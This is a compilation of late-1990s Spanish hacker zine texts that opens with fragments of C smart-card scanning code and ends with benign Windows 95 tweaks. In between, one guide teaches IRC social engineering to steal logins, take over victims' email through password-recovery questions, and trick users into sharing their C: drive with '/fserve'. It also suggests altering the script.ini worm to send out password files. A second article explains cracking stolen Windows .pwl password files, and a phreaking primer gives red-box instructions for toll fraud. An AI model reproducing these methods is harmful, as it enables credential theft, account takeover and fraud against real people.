      len=SIO_ReadBuffer(s,buf,sizeof(buf));
      if (len>0)
	break;
    }

    if (dbglev) {
      SLOG_printf(outf,"FILE 0x%02x: (%d) [RES] ",i,len);
      SLOG_dump(outf,buf,len,0);
      SLOG_printf(outf,"\n");
    }

    if (len!=2) {
      if (retries++>MAX_RETRIES)
	return (-1);
      goto do_again;
    }

    /* process the result 
     * 61 xx is okay with length (Schlumberger Cryptoflex)
     * 9x 00 is okay (Chipknip?) 
     */
    if ( (((buf[0] & 0xf0)==0x90) && (buf[1]==0)) ||
         (buf[0]==0x61) ) {
      filelist[i]=1;
      /* now we need to select the MF again otherwise we can end
       * up confused with going down a directory level which isn't
       * what we want
       */
    } else
      filelist[i]=0;

  }
  return(1);
}

int SCT0_ScanForResponse(SIO_INFO *s,char *ubuf,int ubufsiz)
{
  long aspeed;
  int aparity,adatabits,astopbits,aiomode;
  char buf[256];
  int len,j;

/*  for(aspeed=0;aspeed<N_all_speed;aspeed++) */

    aspeed=0;

    for(adatabits=0;adatabits<N_all_databits;adatabits++)
      for(astopbits=0;astopbits<N_all_stopbits;astopbits++)
        for(aparity=0;aparity<N_all_parity;aparity++)
          for(aiomode=0;aiomode<N_all_iomode;aiomode++) {
	    SIO_SetSpeed(s,all_speed[aspeed]);
	    SIO_SetDataBits(s,all_databits[adatabits]);
	    SIO_SetStopBits(s,all_stopbits[astopbits]);
	    SIO_SetParity(s,all_parity[aparity]);
	    SIO_SetIOMode(s,all_iomode[aiomode]);
	    SIO_WriteSettings(s);

	    len=SIO_WriteBuffer(s,ubuf,ubufsiz);

	    /* we need to delay before reading to give the reader time
	     * to start responding
	     */
	    SIO_Delay(s,100);

	    /* now read in some data - which should be the INS */
	    for(j=0;j<2;j++) {
	      len=SIO_ReadBuffer(s,buf,sizeof(buf));
	      if (len>0)
		break;
	    }

	    if (1||dbglev) {
	      SLOG_printf(outf,"settings: %s\n",SIO_GetSettingsString(s));
	      SLOG_printf(outf,"RESPONSE TO COMMAND\n");
	      SLOG_dump(outf,buf,len,0);
	      SLOG_printf(outf,"\n");
	    }

	  }
  return(0);
}

------------ FIN -------------------------------------------------------------

        Pues disfrutarlo y sed inteligentes con el codigo fuente, lo
  recomendable seria que pasarais por el website del CCC y tambien por los
  urls que se indican en el File Readme.gsm. Byes.

                                                   - J.J.F. / HACKERS TEAM -

<>

<>

        heres libre de poner esto en tu pagina web, distribuirlo en bbs o de
  la forma que tede la gana 'siempre y cuando respetes este encabezado' texto
  escrito,maquetado,y todo lo demas por: ZeD                                         
  dudas comentarios,etc.. a zed@mixmail.com-------
  www.angelfire.com/ak/HACKZED/ZED2.html
  miembro del HaCk`S-wEb-RiNg=http://come.to/HaCkS-wEb-RiNg
------------------------------------------------------------------------------

                   ###############################################
                   #      QUE SE PUEDE HACER EN EL IRC?         #
                   ###############################################
                                    POR: ZeD

        Hay mucha gente (la mayoria) que se mete en el Irc,para conversar con
  gente de otros paises o ciudades,en realidad para eso se creo el Irc
  (Internet Relay Chat).
        Luego con la aparicion de los primeros script`s para el Irc, se
  empezaron a pasar fotos, y otras clases de archivos gracias a la opcion de
  "f-server",que aportaban estos. Mas tarde se empezaron a crear las primeras
  "armas" (y defensas),para lo que hoy denominados "Irc-War",de todos es
  conocido el "Winnuke",y todos (o la mayoria) de los script`s modernos
  incluyen alguna opcion referente al "Irc-War".
        Vale,todo esto esta muy bien,pero.... (ahora llega lo bueno del Irc)
  al conocer a tanta gente,muchas veces (la mayoria),nos cruzamos con el
  tipico tiparraco que se las da de listo y que dice que se sabe todos los
  trucos (en realidad no saben ni de lo que les hablas la mayoria de las
  veces),y lo mejor que puedes hacer con esta gente es aprovecharte de su
  "sabiduria". Para que?,pues para conseguir passwords, loggins, direcciones
  y si te lo montas bien lo que le quieras sacar.
        El perfil de estos individuos suele ser un caracter alegre y muy
  hablador, aqui esta su mayor punto debil. Hablan y la mayoria de las veces
  lo hacen demasiado, aqui es donde entras tu.
        Desde luego si al tio (por muy tonto que sea), le entras diciendole lo
  tipico de: "oye veras esque se me a jodido un archivo del Gindows, y queria
  saber si me podias pasar el tuyo, es un archivo que esta en la carpeta de
  windows, tiene de extension .pwl", el tio lo mas probable es que desconfie y
  o te ignore, o que te diga que usa el "Nt".
        Tienes que usar todo tu ingenio y astucia para hacerte "colegilla"
  sullo. Lo primero que debes hacer es ponerte otro nick que no vallas a usar
  nada mas que cuando vallas a hablar con el, ademas para que sea mas creible
  este nick estaria bien que fuese algo normal como: latino, juan y cosas asi.
        No te pongas El_SeoR_dEl_dEsAsTrE, por que lo mas probabla es que te
  mande a freir monas. Entra en canales donde habitualmente la gente no sea
  muy experta en ordenadores,como #sexo o #fotoxXx, aqui es donde la gente
  mas se enrolla y es de donde puedes sacar mas probecho de tu tiempo.
        Lo siguiente es usar algo de "ingenieria social". si le entras al tio
  como te he dicho antes no te hara ni caso, lo mejor que puedes hacer es, por
  ejemplo si estas en un canal de fotoxXx intentar conseguir el pass y el
  logging de alguna pagina porno yaque en esta clase de canales hay muchas
  personas que son socias de alguna pagina X.
        por ejemplo digamos que has localizado a un tio que crees que pueda
  ser socio de la pagina depago del Play Boy, un ejemplo de como conseguir su
  pass y su loggin seria esta conversacion en un chat privado: (tu heres juan
  y el pepe)

  ->juan: oye he estado viendo las fotos que me has cambiado y me he dado
          cuenta de que hay muchas del Play Boy de donde las has sacado?
  ->pepe: de la pagina
  ->juan: heres socio?
  ->pepe: si
  ->juan: joder pues tienes que tenr mogollon de pelas, por que eso tiene que
          salir caro no?
  ->pepe: no te creas solo cobran 25$ al mes
  ->juan: hombre barato, barato, no es... que tuviste que hacer para hacerte
          socio?
  ->pepe: pues poca cosa, rellene un formulario de inscripcion y a los dos
          dias ya tenia mi clave y mi nombre de usuario
  ->juan: a mi hace unos dias me dieron un nombre y una clave, pero ya no
          funcionaba
  ->pepe: es posible, los cambian cada 2 semanas

        aqui ya te has enterado de que las claves de acceso a la pagina de
  socios del Play Boy las cambian cada 2 semanas

  ->juan: y como os las comunican por e-mail?
  ->pepe: si

        ahora lo que tienes que conseguir es que te de su direccion de e-mail,
  si tienes suerte a donde se lo manden sera a un servicio de e-mail gratuito
  tipo "latinmail". Esto pasa asi la mayoria de las veces debido a que el
  correo tambien lo use su padre, y no creo que le agrade ver como su hijo se
  gasta la paga en pagar un acceso a una pagina pornografica. La mayoria de
  los servicios gratuitos de e-mail disponen de un servicio extra de
  "recordatorio de contraseas" a la que puedes acceder si pones la direccion
  de e-mail (pepe@latinmail.com por ejemplo), y su grupo preferido de musica.
        En estos casos mientras estas hablando con el lo mejor que puedes
  hacer escuando te de su direccion de e-mail, visita su servidor y veras si
  la direccion de e-mail es de uno de estos servios gratuitos. Si no es asi
  intenta sonsacarle a que direccion de e-mail le mandan los passwords.
        Pongamos que se lo mandan a la cuenta "pepe@latinmail.com" y que ese
  servicio de e-mail gratuito pone a disposicion de los usuarios el
  "recordatorio de contrasea".
        Hazte una cuenta en ese servidor para ver si ofrece ese servicio o no
  lo ofrece. Si lo hace (que sera lo mas probable), mira las opcion es que te
  da para recordarte la contrasea. Pongamos que te dan las opciones: "tu
  grupo de musica favorito", "la marca de yogures que compra tu madre" y "el
  nombre de tu discoteca favorita", vale ahora lo que tienes que hacer es,
  averiguar todas esas cosas que te dan opcion a recordar la contrasea de el.
        Una vez que lo hayas logrado intenta entrar en su cuenta de e-mail y
  si lo logras (que sera lo mas probable), intenta averiguar mas o menos
  sobre que dia le mandan los passwords, y listo a entrar en su cuenta de
  e-mail los dias que se las manden, y copiar el loggin y el password, pero
  ojo, no le borres los mensajes que le llegen con los passwords o se olera
  que alguien los a pillado y cambiara su cuenta de e-mail.

        Otra de las cosas que se pueden conseguir en el Irc, son los ya
  famosos ".pwl", que guardan las contraseas del Gindows, esto ultimamente
  se a convertido en algo dicifil de conseguir por que ya lo sabe todo el
  mundo pero prueba por si acaso.
        Pero claro un .pwl, si no lo "descompilas" y lo pasas a codigo
  "legible" no te vale para nada. Ahorate voy a ensear como conseguir usar
  el ".pwl", que con tanto esfuerzo has conseguido sacarle a un pive que se
  conectaba desde una universidad (por ejemplo) (si heres universitario,
  estas de suerte. Pilla todos los ".pwl" que puedas de los ordenadores que
  esten conectados a una red o no, y a disfrutar cambiandote las notas o
  pillando el examen que tienes la semana que viene)

        Bueno supongo que ya tienes el .pwl del ordenador de tu universidad
  objetivo, bien ahora te estaras preguntando "y que coo hago yo con esto?",
  pos te lo explico ahora mismo :) .
        Lo primero que tienes que hacer es copiar las d.n.s de la universidad
  (o de donde sea el pwl) por que si no de poco te va a servir desencriptarlo.
        Vale supongo que ya tienes todo lo necesario de momento, osea el pwl,
  y las d.n.s. Bien ahora lo que tienes que hacer es lo sieguiente.
        La parte del texto que aqui se expone la ha hecho ToMaCHeLi y la voy
  a poner literalmente, tambien puedes bajarte el texto por separado en la
  pagina del HaCk`S-wEb-RiNg http://come.to/HaCkS-wEb-RiNg
------------------------------------------------------------------------------

                                 @@@@@@@@@
        By ToMaCHeLi            @  PWL's  @          By ToMaCHeLi
                                 @@@@@@@@@
------------------------------------------------------------------------------
  1.- Introduccion.
  2.- Que son?.
  3.- Como conseguirlos.
  4.- Como desencriptarlos.
------------------------------------------------------------------------------

  1.- Introduccion:
  -----------------

        Bueno ante todo me he decidido a escribir este articulo para que
  veais la gran seguridad que tiene Windows 95 (ventanucos pa los amigos).
        Asi es que piensate antes de ponerte el Windows 98 (mas de lo mismo
  seguro).

  2.- Que son?:
  -------------

        Los PWL's son archivos donde Windows 95 guarda todas las contraseas
  del sistema (eso si para que queden almacenadas debes seleccionar el cuadro
  donde pone "Guardar contrasea"). Ejemplos pueden ser la contrasea de
  entrada a Windows 95, contrasea de entrada a una carpeta compartida en una
  red LAN, y algunas mas. Pero lo que mucha gente no sabe es que la propia
  contrasea de entrada a INTERNET se guarda en este archivo, incluido
  tambien el nombre de usuario.

  3.- Como conseguirlos:
  ----------------------

        Si sigues leyendo esto veo que te interesa, jeje. Estos archivos se
  encuentran en el directorio principal de Windows 95 que normalmente sera
  c:\windows. Para empezar a practicar un poco puedes coger tus propios PWL
  que tendras en el directorio antes mencionado, y si quieres arriesgarte un
  poco mas puedes intentar conseguir PWL's de otras maquinas.
        Si tienes acceso al ordenata de la universidad donde estudias, de un
  conocido (no amigo, que eso esta mu mal), de una feria de ordenatas, etc..
  pos nada chico pilla los PWL (pero que no te pillen pillandos jeje, Ah! y
  esto yo no te lo he dicho) ;). Tambien puedes intentarlo por el IRC mediante
  ingenieria social (que no sabes lo que es????, que haces leyendo esto tio?
  dejalo ya...) u otras tecnicas que sepas...

  4.- Como desencriptarlos:
  -------------------------

        Asi que ya tienes los archivitos eh?, entonces manos a la obra. Las
  maneras de desencriptarlos son diversas pero la mas facil que he encontrado
  es utilizando un par de herramientas destinadas para ello. Estas
  herramientas son el GLIDE y el PWLTOOL (cada una de ellas tiene sus
  ventajas e inconvenientes). Para usarlas yo recomiendo lo siguiente:

        Supongamos que tenemos el archivo Tom.pwl Lo primero que haria seria
  utilizar el GLIDE para ver si dentro de este archivo hay passwords para
  ello deberia verse algo asi al final del archivo:

  Recource[5] (2)

  Recource[6] (2)

  Recource[7] (2)

  Recource[8] (2)

  Recource[9] (2)

  Recource[10] (50)
  0  -3*Rna\Servicom\a3004773@servicomA2D41B37
  Recource[11] (2)

  Recource[12] (2)

  Recource[13] (54)
  2 $ Todo -0eyݤ OIOIgADMIN
  Recource[14] (2)

  Recource[15] (2)

        (Esos simbolos raros quieren decir que aqui existen passwords).

  Aqui lo importante seria:  
  -------------------------

        Nombre de usuario: a3004773@servicom
        Password: A2D41B37

        (Esto es la conexion a INTERNET a traves de Servicom)
        (NO es verdadera por supuesto) :)
------------------------------------------------------------------------------

        Si no existen passwords en el archivo (que tambien puede ser) se
  veria asi: (si te sale esto tira a la papelera el PWL) :))

  Recource[5] (2)

  Recource[6] (2)

  Recource[7] (2)

  Recource[8] (2)

  Recource[9] (2)

  Recource[10] (50)

  Recource[11] (2)

  Recource[12] (2)

  Recource[13] (54)

  Recource[14] (2)

  Recource[15] (2)

        (aqui no hay passwords).

  Aqui lo importante seria:
  -------------------------

        NADA NADA NADA NADA NADA NADA NADA NADA NADA Y NADA
                           
-----------------------------------------------------------------------------

        Y te preguntaras, si ya aparece la password de INTERNET y el nombre
  de usuario con el GLIDE pa que usar el PWLTOOL????. Te explico, tengo
  comprobado que cuando la password de INTERNET supera los 8 digitos a partir
  del digito 8 ya no apareceran los restantes (joer explicate). Por ejemplo:

        Password verdadero : 795342A3B5
        Password que aparece con el GLIDE: 795342A3

        (fijate falta el B5)

        Pues este es el inconveniente que tiene el GLIDE y por eso se utiliza
  el PWLTOOL.
        Pero con este hay otro pequeo inconveniente, resulta que para que
  salgan todos los password que hay dentro del PWL se necesita el password de
  entrada a Windows 95 (joer que lio).
        Ejemplo, tenemos el archivo Toma.pwl, este archivo debes ponerlo en
  el directorio de windows del ordenata de tu casa por ejemplo, despues
  reinicias el equipo para que te pida contrasea de entrada al equipo (esto
  activalo en el panel de control-contraseas), cuando te pida el nombre de
  usuario pon Toma (se me olvidava en los PWL el nombre del archivo es siempre
  el nombre del usuario, ejemplo Toma.pwl Nombre de usuario: Toma).
        Ahora viene lo malo, sabes la contrasea de ese nombre de usuario??,
  si la sabes la pones y ya esta entras en Windows 95 ejecutas el PWLTOOL y ..
  TACHAN!!! todas las passwords que contiene el PWL te seran desveladas sin
  el inconveniente que tiene el GLIDE (lo de los 8 digitos, recuerdas??).

        (Pa los que no tienen la contrasea del nombre de usuario de windows)
        Pero y si no sabes la contrasea de entrada a Windows con ese nombre
  de usuario??
        Arggg, eso se complica, entonces deberas usar el PWLTOOL en el que
  una de sus opciones es la de utilizar un diccionario de palabras para sacar
  la contrasea del nombre de usuario del archivo PWL (y esto no es facil...,
  pero se puede conseguir).
        Tambien puedes pensar otras maneras de utilizar el PWLTOOL pero eso
  te lo dejo a ti no te voy a decir todo macho (o gachi lo que seas, una gachi
  hacker??, que raro no hay muchas...).

        Por mi parte es todo, espero que os haya servido de ayuda todo este
  rollo. Si algunno quiere aadir o corregir algo que me avise.

******************************************************************************

        Este articulo es de libre distribucion (siempre que no modifiques
  nada, o te buscare hasta la muerte jeje), ademas no me hago responsable de
  lo que puedas llegar a cometer con su contenido.

******************************************************************************

        Articulo realizado para el grupo Hack's-Web-Ring.

                            Realizado por:

                          --- ToMaCHeLi ---

                 WEB: http://members.tripod.com/~tomacheli

                      MAIL: tomacheli@geocities.com

        Un saludo pa todos los del grupo :) 
-----------------fin del texto escrito por ToMaCHeLi--------------------------

        bien despues de esto supongo que estras deseando entrar  en el Irc y
  empezar a actuar, pero antes de hacer eso te recomiendo que sigas leyendo
  por que voy a pasar a explicarte algunos trucos quete facilitaran la vida
  en el Irc.
        Muchas veces lo de la ingenieria social no funciona y pillar un pwl
  apartir de este metodo se esta convirtiendo cada dia mas dificil, pero
  existe un comando que te puede facilitar las cosas por que no todo el mundo
  lo conoce (y sobre todo los novatos) el comando en cuestion es el
  siguiente: /fserve el_nick_que_uses 5 c:\
        si haces que un usuario ponga este comando en el canal, privado,
  Dcc-chat.... lo que hara este comando es darte acceso a su unidad c:\, el
  pequeo inconveniente que tiene esto es que el pive antes de darte acceso
  le saldra un mensage que le dira que te va a dar acceso a su unidad c:\, el
  mensage en cuestion sale en ingles, osea que si tienes suerte y el pive no
  controla mucho ingles, pasara de leer el mensage y aceptara sin pedirte
  ninguna explicacion.
        Seguro que has oido hablar del archiconocido "virus" del "script.ini"
  como sabras este "virus" lo que hace es que cuando entras en un canal
  enviasa todos los alli presentes este archivo, pero.... has probado a
  modificar este "ini" para que envez de mandar el "script.ini", mande el
  "c:\windows\*.pwl"? investiga que esto puede ser muy interesante.
        Otra opcion que tienes si tienes algo de idea de "scripting" es
  modificar la parte del fserver del script que uses para que envez de que
  cuando te den acceso a un fserver en la carpeta que ellos elijan te lo den
  en "c:\" o en "c:\windows", esto no se de que manera se puede hacer,
  pero me han dicho que si se puede,osea que andaros al loro y echad un
  vistazo de vez encuando a las personas que esten en vustro fserver, para ver
  por donde andan y lo que se estan bajando.

        pues eso es todo, si tienes alguna duda, sugerencia o simplemente
  quieres decirme algo referente a este texto, puedes hacerlo escribiendo a:
  zed@mixmail.com
                          !!feliz irc-hack a todos

<>

<>

        ZeD no se hace responsable de las consecuencias que te pueden suceder
  si usas mal cualquier informacion aqui dada, pero te recomienda que no uses
  nada de lo aqui escrito (por tu bien)
        puedes subir este texto a tu web, bbs o distribuirlo de la manera que
  te de la gana siempre y cuando mantengas este encabezado, no alteres ninguna
  parte del texto y me avises antes a zed@mixmail.com
------------------------------------------------------------------------------

                ##############################################
                #          PHREACKING PARA NOVATOS           #
                ##############################################
              por ZeD---http://www.angelfire.com/ak/HACKZED/ZED2.html
                     ---http://come.to/HaCkS-wEb-RiNg
                      (miembro del HaCk`S-wEb-RiNg)                                                          


  1.que es phreackear?
  2.por que phreackear?
  3.reglas
  4.como empezar en esto del phreacking?
  5.descripcion brebe de las BOXES
  6.RED-BOXING
  7.despedida y cierre
------------------------------------------------------------------------------

  1. QUE ES PHREACKEAR?

        phreackear es simplemente hacer cualquier tipo de llamadas
  (provinciales, internacionales) completamente sin pagar un duro, tener un
  conocimento + o - completo de la red de telefonia y de que se puede hacer
  con ella, como usar determidas cosas para no pagar un servicio que deveria
  ser mucho mas barato, ya que es algo que se ha convertido en algo
  INPRESCINDIBLE.

  2. POR QUE PHREACKEAR?

        la explicacion es muy simple,piensalo de esta manera: por que tengo
  que pagar una factura que cada dia es mas elevada por usar un SERVICIO de
  maxima NECESIDAD? por ademas de ahorrar pagar la luz el agua...etc... que
  tambien son SERVICIOS de maxima NECESIDAD, tambien lo tengo que hacer para
  pagar el telefono? pues por una razon muy simple, las compaias telefonicas
  abusan de los consumidores que usan un SERVICIO cobrandoles mucho mas de lo
  que deveria costar, solo por que es NECESARIO, ademas, ellos nos engaan
  con "PLANES CLAROS" y demas jilipolleces que luego siempre son mentira, por
  que no les vas a poder engaar tu a ellos tambien?

  3. REGLAS DEL PHREACKING

        como en todo, aqui tambien hay que seguir unas reglas, que mas que
  PENALES, son MORALES.

  1- no uses nunca una BOX con tu propia linea telefonica (seria de tontos
     hacerlo)
  2- no hablar de tus proyectos phreackers por telefono (lo mismo de arriba)
  3- no uses tu nombre real cuando estes haciendo phreack (no tengo que
     decirtelo verdad?)
  4- todos los materiales que uses debes guardarlos en buen sitio, no es
     conveniente que vallas dejando las cosas por hay tiradas para que la
     gente las vea
  5- (y aunque se contradiga con la primera) no es bueno joder a otra persona,
     que como tu esta siendo abusado por una compaia telefonica, intenta usar
     siempre lineas de empresas multimillonarias o cosas asi (aunque esto
     conlleva un mayor riesgo claro)

  4. COMO EMPEZAR EN ESTO DEL PHREACKING?

        lo primero que tienes que hacer es construir los BOXES que vallas a
  usar en tus "sesiones" de todas maneras si tienes problemas al construirlos
  siempre hay otras alternativas... ;-) para empezar a phreackear lo que
  tienes que hacer es elejir bien los sitios donde lo vallas a hacer, como
  heres nuevo en esto, tardaras algo mas de tiempo que uno que ya controla
  del tema por lo tanto te recomiendo que uses sitios poco transitados y que
  lo hagas siempre de noche.

  5. DESCRIPCION DE LAS BOXES

    nombre de la BOX                    UTILIDAD
  ---------------------             ----------------

  RED-BOX-------------------genera tonos para llamadas gratis
  BLACK-BOX-----------------cuando se llama,el que llama no paga un duro
  BEIGE-BOX-----------------llamas con la linea de otra persona(la unica que
                            funciona en espaa)
  GREEN-BOX-----------------genera tonos de llamada a cobro revertido
  CHEES-BOX-----------------cambia tu telefono a modo "cabina telefonica"
  ACRILIC-BOX---------------roba 3 vias de linea
  WATER-BOX-----------------detine el rastreo de la policia
  BOX-LANZAMIENTO-----------amplificador para el microfono del telefono
  BOX-BORRON(near)----------corta todas las lineas de tu area
  MAROON-BOX----------------crea una "party line"
  BOX-BROTE-----------------llama a los telefonos de tus vecinos
  CHROME-BOX----------------manipula las seales de trafico
  BOX-CLARA-----------------llamdas gratis
  COLOR-BOX-----------------graba las conversaciones telefonicas
  BOX DE COBRE--------------causa interferencias entre dos lineas que se esten
                            usando
  INFINITE-BOX--------------telefono de uso remoto
  BOX-ARCO IRIRIS-----------corta cualquier rastreo en la linea

        existen mas boxes pero estas son las mas interesantes.

  6. RED-BOXING 

        aqui te voy a explicar como hacer una red-box: lo primero que tienes
  que hacer es ir a tienda de radio y comprar un dialer que sea de tonos (un
  marcador de tonos valla) y un cristal de 6,5536 Mhz abre el marcador y
  quita el cristal que lleva, ahora mete el de 6,5536 Mhz (el que has
  comprado tu) cierras el marcador y EVOILA ya tienes tu red-box.
        estos es muy bonito pero como lo uso ahora? te estaras preguntando
  (joder que impacientes sois) para hacerlo funcionar tienes que hacer lo
  siguiente: cuando te pidan 25pts para la llamada en el marcador tienes que
  pulsar "5*'s" por ejemplo (sin las comillas obviamente) cuando son 5pts
  "1*." cuando son 10pts hay que marcar "3*'s" y asi a que no es dificil?

  7. DESPEDIDA Y CIERRE

        bueno pues esto es todo espero que esto te aya servido de referencia
  si estas empezando en esto del phreacking y si ya eres un entendido para
  recordarte algo que se te avia olvidado, en fin que me aya tirado 15
  minutos, para que valga de algo joe
        bueno si me quereis comentar algo ya sabeis que podeis escribirme a
  zed@mixmail.com y que todo lo que he dicho a qui no es mas que una guia
  para que aprendas, pero no para que uses lo que aprendas 8-), pero si lo
  haces....aya tu bye

<>

<>

                    ############################################
                    #      como trucar el Gindows95           #
                    ############################################

           texto escrito por ZeD--www.angelfire.com/ak/HACKZED/ZED2.html
                           --http://come.to/HaCkS-wEb-RiNg
  puedes subir este texto a tu web,bbs,ftp o lo que sea,siempre que mantengas
  este encabezado.
                             ACTUALIZACION:10/8/98


        ZeD no se hace responsable de los daos que el uso de este documento
  pueda ocasionar a tu pc y te recomienda siempre hacer copias de seguridad
  (por si las moscas)

        INDICE:
  1.como trucar el internet explorer
  2.pon el nombre que quieras a la papelera de reciclaje
  3.cambia el icono de las carpetas por el que tu quieras
  4.interface de 3.11 en w95
  5.crear un acceseo directo para apagar el pc
  6.cambiar el nombre de "mi pc"
  7.MS2.sys
  8.utilidades del sistema
  9.PROXImamente

------------------------------------------------------------------------------

  1.COMO TRUCAR EL INTERNET-EXPLORER v3.1 en adelante

        simpre has querido cambiar el dibujio de la "E" que sale cuando estas
  navegando con el internet-explorer, pues es bien simple.
        La imagen que sale es un archivo ".bmp" que esta en la carpeta
  ..../internet explorer/ son los archivos que se llaman "Ani38.bmp" y
  "Ani26.bmp" abrelos y mira como son. Veras que son como una tira que segun
  la vas bajando se convierte en una animacion. Vale pues ahora crea tu logo
  tal como esta definido en los archivos cambialo y ya tienes el explorer
  trucado (puedes bajarte algunas imagenes de mi pagina que esta en:
  www.angelfire.com/ak/HACKZED/ZED2.html,en la seccion "download")

  2.COMO CAMBIAR EL NOMBRE A LA PAPELERA DE RECICLAJE

        cambiar el nombre de la papelera de reciclaje es muy simple: cambia
  el nombre en la clave del "regedit":(esta en la carpeta "windows")
  HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E

  3.CAMBIAR EL ICONO DE LAS CARPETAS POR EL QUE TU QUIERAS

        para cambiar el icono que representa las carpetas tienes que hacer lo
  siguiente: Muchos de los iconos que por defecto traen algunos archivos se
  pueden cambiar simplemente desde cualquier carpeta, mediante el menu ver,
  luego opciones... , tipos de arhivos y por ultimo editar, e inmediatamente
  despues selecionar cambiar icono. Pero esto no siempre nos vale, sobre todo
  si queremos cambiar los iconos de por ejemplo, las carpetas, el menu de
  Inicio...
        Para ello el truco es el siguiente: Lo primero que tenemos que hacer
  es saber el icono que queremos cambiar... por ejemplo, para cambiar el
  icono de las carpetas, debemos ejecutar el registro, irnos a la seccion
  HKEY_CLASSES_ROOT\Folder\DefaultIcon en la parte derecha aparecera
  (preterminado) "C:\WINDOWS\SYSTEM\shell32.dll,3", la primera idea.. que no
  funciona :) es ir y cambiar directamente el valor de la cadena para poner
  el icono que queremos. Pero lo que tenemos que hacer es ir a la seccion 
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ explorer y
  crear una nueva clave, Shell Icons, despues creamos un nuevo valor de la
  cadena, con el numero del icono indicado en el DefaultIcon que queremos
  cambiar, en nuestro caso el 3, seleccionamos este valor, pulsamos 2 veces y
  en Informacion del valor introducimos el path del archivo que tiene el
  icono que queremos poner, con su numero correspondiente. En mi caso es:

  nombre                 | datos
  (predeterminado)         (valor no establecido)
  3                        "c\iconos\folders.icl,70"

        Bueno.. ya hemos hecho lo mas dificil. Pero aun queda algo mas.
  Windows 95 guarda una cache de Iconos en el directorio de instalacion del
  95, llamado ShellIconCache, este archivo esta oculto. Debemos de borrar
  este archivo para que los cambios surjan efecto, pero hay que borrarlo
  fuera de la sesion de Windows.. osea.. que hay que reiniciar en modo MS-DOS,
  quitar los atributos al archivo (en MSDOS este se llama shelli~1), borrarlo
  y reiniciar el entorno grafico (hoy en dia llamado sistema operativo.. :P)
  y ya esta, tenemos nuestro icono favorito como icono de carpeta.. :) De
  igual manera con el resto de los iconos del 95.

        PD: Importante, si tenemos la utilidad TWEAK UI de las Powertoys de
  Microchof  (si, MICROCHOF... ) podemos borrar el cache de iconos desde la
  pestaa Repair, con el boton Rebuid Icons. Y si tenemos el MicroAngelo..
  todo esto nos lo hace ese fantastico programa.. pero conviene saber hacer
  las cosas "a pelo".

  4.INTERFACE DEL W3.11 EN EL W95

        este es bastante mas simple que el anterior, lo que tienes que hacer
  es lo siguiente:
  1- edita el archivo "SYSTEM.INI" (directorio de windows)
  2- en la seccion "BOOT", busca la linea que pone "SHELL=EXPLORER.EXE"
  3- cambia lo de "EXPLORER.EXE" por "PROGMAN.EXE"
  4- reinicia el pc y listo.

  5.ACCESO DIRECTO PARA APAGAR EL PC

        esto es de lo mas simple, haz lo siguiente: crea una cceso directo en
  el escritori,vete a propiedades y en loreferente a acceso direco busca
  "DESTINO".alli pones lo siguiente:
  C:\WINDOWS\RUNDLL32.EXE user.exe,ExitWindows le das a aplicar, acetar y ya
  esta.

  6.cambiar el nombre de "MI PC"

        para hacer esot tienes que seguir los siguientes pasos: vete al
  "REGEDIT" cambia la clave::
  HKEY_CLASSES_ROOT\CLSID\{2OD04FE0-3AEA-1069-A2D8-08002B30309D} pon el
  nombre quele quieras poner a "MI PC" y ya esta.

  7.MS2.sys

        lo primero que tienes que hacer es localzar este archivo, una vez
  encontrado, para poder editarlo tendras que cambiar sus atributos.
  una vez puedas editarlo, dirijete a la parte de "OPTIONS":

  [Options]

  BootDelay = 0 Aumenta la velocidad de booteo,el mensaje "Starting Windows.."
              no aparece.

  BootMenu = 1 Despliega automaticamente el menu de arranque de WIndows 95.

  BootMenuDefault = 1 El numero de opcion por default.

  BootMenuDelay = 10 Numero de segundos que el menu de inicio es desplegado.

  Logo = 0 No despliega la imagen del logo de arranque de Win95.

  BootMulti = 1 Hace disponible un doble booteo con DOS.

  8.UTILES DEL SISTEMA

        el w95 trae algunas erramientas que te permitiran hacer cosillas
  (algo basicas) muy interesantes para ir empezando, aqui te voy a explicar el
  funcionamiento de dos de ellas el Telnet, un viejo amigo que ya conoce todo
  el mundo y el Ftp, si si, has leido bien el 95 (bueno en realidad el MS2)
  trae una version bastante simple (pero util) de programa FTP.

  TELNET.

        en la carpeta windows (o como la ayas llamado) hay un .exe que se
  llama Telnet, este programa sirve para hacer conexiones desde tu sistema a
  otro remoto a traves de una red (internet principalmente), en lo que
  consiste basicamente este programa es en acceder a unos determinados
  puesrtos de un sistema remoto en los cuales puedes hacer varias cosas, como
  por ejm: bajarte el correo,mirar el directorio de una web.....
        aqui te expongo una lista de los puertos con una descripcion de para
  lo que vale cada uno de ellos: (el numero que aparece entre parentesis es
  el puerto)

  auth (113)
  conference (531)
  courier (530)
  daytime (13)
  discard (9)
  domain (53)
  echo (7)
  efs (520)
  exec (512)
  finger (79)
  ftp (21)
  gopher (70)
  hostnames (101)
  http (80)
  ingreslock (1524)
  link (87)
  login (513)
  mtp (57)
  nameserver (42)
  netbios (139)
  netnews (532)
  netstat (15)
  nntp (119)
  pop2 (109)
  pop3 (110)
  proxy (8080)
  qotd (17)
  remotefs (556)
  rje (77)
  sftp (115)
  shell (514)
  smtp (25)
  spooler (515)
  sunrpc (111)
  supdup (95)
  systat (11)
  telnet (23)
  tempo (526)
  tftp (69)
  time (37)
  uucp (540)
  uucp-path (117)
  whois (43)
  www (80)

  como se hace un Telnet?
  pues hacerlo es muy simple:

        si nos proporcionan la direccion telnet "maquina.remota.es 2010"
  hariamos lo siguiente: (puede variar segun sistemas):
  * Tecleamos en la linea de comandos "TELNET maquina.remota.es 2010" (En
    otros sistemas teclearemos "TELNET" y despus "OPEN maquina.remota.es
    2010" ) con lo que veremos algo parecido a esto:

   * telnet MAQUINA.REMOTA.ES 2010
   * Trying 130.132.21.53 Port 2010 ...
   * Connected to MAQUINA.REMOTA.ES
   * Escape character is ...

  * Esto nos dice mas o menos que esta intentando conectar con la direccion,
    nos devuelve la direccion IP, se conecta, y nos dice cual es el "caracter
    escape".
  * Una vez hemos conectado se nos pide un "login" y/o "password" para entrar
    a la maquina remota. En algunos casos podremos conectar a la maquina
    remota con el login "guest" (invitado) pero la mayoria de las veces
    deberemos saber el login antes de conectarnos.
  * El siguiente paso es configurar la emulacion de terminal, es decir,
    decirle al sitio remoto como queremos que nos muestre los datos en
    nuestra pantalla. La configuracion mas comun es la VT100, que es la
    estandar para las comunicaciones basadas en terminales. (algunos clientes
    telnet configuran ellos la emulacion).
  * El ultimo paso (despues de haber utilizado el servicio es salir ;-) Como
    las pulsaciones de tecla no las hacemos "realmente" en nuestra maquina,
